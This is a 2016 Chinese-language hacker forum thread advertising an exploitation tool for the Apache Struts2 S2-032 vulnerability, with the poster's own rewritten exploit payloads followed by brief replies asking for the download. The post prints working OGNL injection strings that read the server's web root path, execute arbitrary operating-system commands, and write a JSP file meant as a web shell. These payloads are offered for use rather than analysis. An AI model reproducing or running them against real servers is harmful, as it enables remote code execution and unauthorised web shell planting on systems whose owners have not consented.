Struts2-032漏洞利用工具

90_ · 发表于 2016-4-26 22:41:12

转载自shack2

新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具，这个鸡肋工具就不在这里共享了。
顺便分享下我改写的exp：

S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

[Java] 纯文本查看 复制代码

获取磁盘目录：
1. 
method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8
 
 
执行命令:
1.
method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8
 
2.
method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8
 
上传文件：
1.
method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f

游客，如果您要查看本帖隐藏内容请回复

ihonker08sec · 发表于 2016-4-27 08:24:33

支持红客联盟

csadsl · 发表于 2016-4-27 09:48:39

有下载工具么

远古葫芦娃 · 发表于 2016-4-27 10:07:06

Silence7 · 发表于 2016-4-27 10:21:03

我来看看 90牛x

张小强 · 发表于 2016-4-27 10:25:07

看下怎么样

lincx · 发表于 2016-4-27 10:28:26

来学习的

wht1161032908 · 发表于 2016-4-27 11:09:21

这个漏洞今天爆炸了

浮尘 · 发表于 2016-4-27 12:17:33

wht1161032908 发表于 2016-4-27 11:09
这个漏洞今天爆炸了

昨晚就已经爆炸了

tzwl2016 · 发表于 2016-4-27 12:32:56

[工具专区] Struts2-032漏洞利用工具

评分

点评

评分

指导单位

旗下站点

联系我们